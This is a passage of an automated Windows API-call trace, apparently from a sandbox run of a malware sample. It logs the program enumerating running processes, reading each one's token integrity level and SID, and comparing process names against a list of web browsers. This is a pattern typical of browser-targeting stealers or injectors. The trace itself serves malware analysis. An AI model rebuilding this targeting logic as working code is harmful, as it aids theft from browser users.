dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a7") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.346] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.346] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.346] GetLastError () returned 0x7a [0321.346] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.347] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.347] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.347] CloseHandle (hObject=0x444) returned 1 [0321.347] CloseHandle (hObject=0x5b0) returned 1 [0321.347] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0321.347] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0321.347] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0321.347] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0321.347] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0321.347] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0321.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0321.347] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.347] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.347] GetLastError () returned 0x7a [0321.348] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.348] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.348] CloseHandle (hObject=0x444) returned 1 [0321.348] CloseHandle (hObject=0x5b0) returned 1 [0321.348] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0321.348] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247e28, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a8") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.348] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.348] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.348] GetLastError () returned 0x7a [0321.348] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.348] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.348] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.348] CloseHandle (hObject=0x444) returned 1 [0321.348] CloseHandle (hObject=0x5b0) returned 1 [0321.349] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0321.349] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0321.349] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0321.349] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0321.349] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0321.349] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0321.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0321.349] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x444) returned 1 [0321.349] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0321.349] GetLastError () returned 0x7a [0321.349] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x1, TokenInformation=0x238f018, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238f018, ReturnLength=0x275fc44) returned 1 [0321.349] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0321.349] CloseHandle (hObject=0x444) returned 1 [0321.349] CloseHandle (hObject=0x5b0) returned 1 [0321.349] GetLengthSid (pSid=0x238f020*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0321.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0321.350] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248610, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x13\x1a9") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0321.350] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x444) returned 1 [0321.350] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0321.350] GetLastError () returned 0x7a [0321.350] GetTokenInformation (in: TokenHandle=0x444, TokenInformationClass=0x19, TokenInformation=0x238eaa8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eaa8, ReturnLength=0x275fc70) returned 1 [0321.350] GetSidSubAuthorityCount (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238eab1 [0321.350] GetSidSubAuthority (pSid=0x238eab0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238eab8 [0321.350] CloseHandle (hObject=0x444) returned 1 [0321.350] CloseHandle (hObject=0x5b0) returned 1 [0321.350] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0321.350] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0321.350] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0321.350] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0321.351] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0321.351] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0321.351] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0321.351] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0323.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x275fc94 | out: SystemInformation=0x0, ResultLength=0x275fc94*=0xafa0) returned 0xc0000004 [0323.415] VirtualAlloc (lpAddress=0x0, dwSize=0xbfa0, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0323.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x240000, Length=0xbfa0, ResultLength=0x0 | out: SystemInformation=0x240000, ResultLength=0x0) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0323.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0323.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0323.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0323.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0323.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0323.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0323.419] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.419] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.419] GetLastError () returned 0x7a [0323.419] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.419] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.419] CloseHandle (hObject=0x66c) returned 1 [0323.419] CloseHandle (hObject=0x5b0) returned 1 [0323.419] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b0 [0323.419] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248720, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08<") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.419] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.420] GetLastError () returned 0x7a [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.420] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.420] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.420] CloseHandle (hObject=0x66c) returned 1 [0323.420] CloseHandle (hObject=0x5b0) returned 1 [0323.420] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0323.420] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0323.420] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0323.420] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0323.420] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0323.420] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0323.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0323.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0323.420] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.420] GetLastError () returned 0x7a [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.420] CloseHandle (hObject=0x66c) returned 1 [0323.420] CloseHandle (hObject=0x5b0) returned 1 [0323.420] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5b0 [0323.420] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x246960, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08=") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.420] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.420] GetLastError () returned 0x7a [0323.420] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.420] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.420] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.421] CloseHandle (hObject=0x66c) returned 1 [0323.421] CloseHandle (hObject=0x5b0) returned 1 [0323.421] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0323.421] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0323.421] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0323.421] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0323.421] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0323.421] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0323.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0323.421] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.421] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.421] GetLastError () returned 0x7a [0323.421] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.421] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.421] CloseHandle (hObject=0x66c) returned 1 [0323.421] CloseHandle (hObject=0x5b0) returned 1 [0323.421] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5b0 [0323.421] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247060, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08>") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.421] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.421] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.421] GetLastError () returned 0x7a [0323.421] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.421] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.421] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.421] CloseHandle (hObject=0x66c) returned 1 [0323.421] CloseHandle (hObject=0x5b0) returned 1 [0323.422] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0323.422] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0323.422] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0323.422] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0323.422] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0323.422] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0323.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0323.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0323.422] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.422] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.422] GetLastError () returned 0x7a [0323.422] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0323.422] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0323.422] CloseHandle (hObject=0x66c) returned 1 [0323.422] CloseHandle (hObject=0x5b0) returned 1 [0323.422] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5b0 [0323.422] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247968, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08?") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.422] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0323.422] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0323.422] GetLastError () returned 0x7a [0323.422] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0323.422] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0323.422] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0323.422] CloseHandle (hObject=0x66c) returned 1 [0323.422] CloseHandle (hObject=0x5b0) returned 1 [0323.423] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.423] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.423] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0323.423] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.423] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.423] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0323.423] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0323.423] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0323.423] GetLastError () returned 0x7a [0323.423] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, 